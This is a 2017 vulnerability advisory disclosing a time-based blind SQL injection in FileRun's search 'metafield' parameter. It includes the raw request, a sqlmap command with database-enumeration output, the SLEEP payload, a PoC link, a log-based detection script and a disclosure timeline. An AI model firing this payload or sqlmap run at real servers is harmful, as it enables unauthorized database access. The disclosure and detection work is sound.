Some time ago, while doing a pentest, we found a vulnerability in a file sharing web application named FileRun. FileRun is a self-hosted cloud storage application that lets you access, back up and share your files (photos, videos, documents and more) from anywhere.

The Vulnerability

The vulnerability is reachable only after authentication. After logging in as any user, go to Search -> Drop down menu -> Search Metadata and choose any metadata field; for this example we chose Tags. This generates a POST request to the server like the one below:

POST /?module=search&section=ajax&page=grid HTTP/1.1
Host: 192.168.2.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.2.133/
Content-Length: 88
Cookie: FileRunSID=u71u3j1fiqjk1ntmsm7f84d8c4; language=english
Connection: close
Pragma: no-cache
Cache-Control: no-cache

metafield=7&searchType=meta&keyword=&searchPath=%2FROOT%2FHOME&path=%252FROOT%252FSEARCH

We noticed that the metafield parameter might be vulnerable to SQL injection, so we appended a single quote to the value (e.g. metafield=7') and examined the server response, which came back with the following interesting error:

HTTP/1.0 500 Internal Server Error
Date: Wed, 20 Sep 2017 09:46:48 GMT
Server: Apache/2.4.7 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Judging by that response, our spider sense was tingling, so we threw our awesome and favorite tool at the metafield parameter for fast confirmation.

root@kali:~# sqlmap -u "http://192.168.2.10/?module=search&section=ajax&page=grid" --data "metafield=7&searchType=meta&keyword=&searchPath=%2FROOT%2FHOME&path=%252FROOT%252FSEARCH" --cookie "FileRunSID=qpgjv055ne2tluvnp10fao0gl3; language=english" -p metafield --dbms=mysql --level=5 --technique=T --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.8#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:49:19

[10:56:03] [INFO] testing connection to the target URL
[10:56:03] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[10:56:03] [WARNING] heuristic (basic) test shows that POST parameter 'metafield' might not be injectable
[10:56:03] [INFO] testing for SQL injection on POST parameter 'metafield'
[10:56:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[10:56:03] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[10:56:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[10:56:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:56:14] [INFO] POST parameter 'metafield' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n] y
[10:56:18] [INFO] checking if the injection point on POST parameter 'metafield' is a false positive
POST parameter 'metafield' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: metafield (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: metafield=7) AND (SELECT * FROM (SELECT(SLEEP(5)))uKlV) AND (3045=3045&searchType=meta&keyword=&searchPath=/ROOT/HOME&path=%2FROOT%2FSEARCH
---
[10:59:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL >= 5.0.12
[10:59:27] [INFO] fetching database names
[10:59:27] [INFO] fetching number of databases
[10:59:27] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:59:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
2
[10:59:39] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:59:45] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[11:00:42] [INFO] retrieved: filerun
available databases [2]:
[*] filerun
[*] information_schema

[11:01:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 87 times
[11:01:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.10'

[*] shutting down at 11:01:04

And yes, the vulnerability is confirmed.
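As an added example (not from the original advisory or from the FileRun project), the Python script below shows how a defender could spot a run like the one above in Apache access logs: a single client hitting the search endpoint with a high share of 500 responses (sqlmap reported 87 of them) and repeated responses delayed by whole seconds, which is the footprint of SLEEP-based blind injection. It assumes a LogFormat that appends %D (response time in microseconds) to the combined format; the log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed Apache access log lines (combined format plus %D, the response time in
# microseconds); not real FileRun logs. 500s carry a 0-byte body, as in the advisory.
SAMPLE_LOG = """\
192.168.2.10 - - [20/Sep/2017:10:56:03 +0000] "POST /?module=search&section=ajax&page=grid HTTP/1.1" 200 412 38000
192.168.2.10 - - [20/Sep/2017:10:56:04 +0000] "POST /?module=search&section=ajax&page=grid HTTP/1.1" 500 0 41000
192.168.2.10 - - [20/Sep/2017:10:56:14 +0000] "POST /?module=search&section=ajax&page=grid HTTP/1.1" 200 412 5042000
192.168.2.10 - - [20/Sep/2017:10:56:20 +0000] "POST /?module=search&section=ajax&page=grid HTTP/1.1" 500 0 36000
192.168.2.10 - - [20/Sep/2017:10:56:26 +0000] "POST /?module=search&section=ajax&page=grid HTTP/1.1" 200 412 5038000
192.168.2.10 - - [20/Sep/2017:10:56:32 +0000] "POST /?module=search&section=ajax&page=grid HTTP/1.1" 200 412 1031000
192.168.2.50 - - [20/Sep/2017:10:57:01 +0000] "POST /?module=search&section=ajax&page=grid HTTP/1.1" 200 412 40000
192.168.2.50 - - [20/Sep/2017:10:57:09 +0000] "GET /?module=fileman&page=grid HTTP/1.1" 200 2210 33000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<usec>\d+)$'
)

def parse_log(text):
    """Yield one dict per well-formed line; silently skip lines that do not match."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            rec["usec"] = int(rec["usec"])
            yield rec

def find_suspects(text, endpoint="module=search", min_requests=5,
                  slow_sec=1.0, min_error_ratio=0.25, min_slow=2):
    """Return {ip: stats} for clients whose requests to `endpoint` combine a high 500
    rate with repeated slow responses (>= slow_sec), the footprint of SLEEP-based blind injection."""
    per_ip = defaultdict(list)
    for rec in parse_log(text):
        if endpoint in rec["path"]:
            per_ip[rec["ip"]].append(rec)
    suspects = {}
    for ip, recs in per_ip.items():
        if len(recs) < min_requests:
            continue  # too few requests to judge
        errors = sum(1 for r in recs if r["status"] == 500)
        slow = sum(1 for r in recs if r["usec"] >= slow_sec * 1_000_000)
        if errors / len(recs) >= min_error_ratio and slow >= min_slow:
            suspects[ip] = {"requests": len(recs), "errors_500": errors, "slow": slow}
    return suspects
```

The thresholds are deliberately tunable: on a real server, baseline the endpoint's normal latency and error rate first, then alert on clients that exceed both.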

Proof of Concept

Here we created a simple script that extracts the current database name using the time-based technique:
https://github.com/modpr0be/exploit-dev/blob/master/exploit-repo/filerun/poc-filerun.py

Patch and Fix

We have already contacted the FileRun developer, Afian AB, and worked closely with them to disclose this vulnerability. FileRun users are advised to update immediately to the latest version using the installation control panel; please refer to this documentation.

Aftermath

Thanks to Vlad Roman, who quickly responded to our emails and took immediate action on this finding. Here is the communication log:

Sept 20, 2017 Initial contact with FileRun team
Sept 22, 2017 Vulnerability acknowledged by FileRun team, who said that a patch would be released within a couple of days.
Sept 25, 2017 FileRun team released a patch.
Sept 27, 2017 Draft of security advisory document was sent to FileRun team.
Sept 29, 2017 Advisory published.

About the Author modpr0be

Thomas Gregory (modpr0be) is currently the director and owner of PT Spentera, a company focused on penetration testing, incident response, intrusion analysis and forensic investigation. I frequently consult on security strategy for investors, partners and customers. Outside of work, the author delivers training material and contributes to the community through seminars, workshops and discussions on topics such as hacking techniques, exploitation techniques and intrusion analysis. I also contribute to the Metasploit Framework exploit repository as an exploit developer. I currently hold the Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001:2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA) and Offensive Security Exploitation Expert (OSEE) certifications. If you want to contact me, you can reach me by email at tom at spentera dot id.
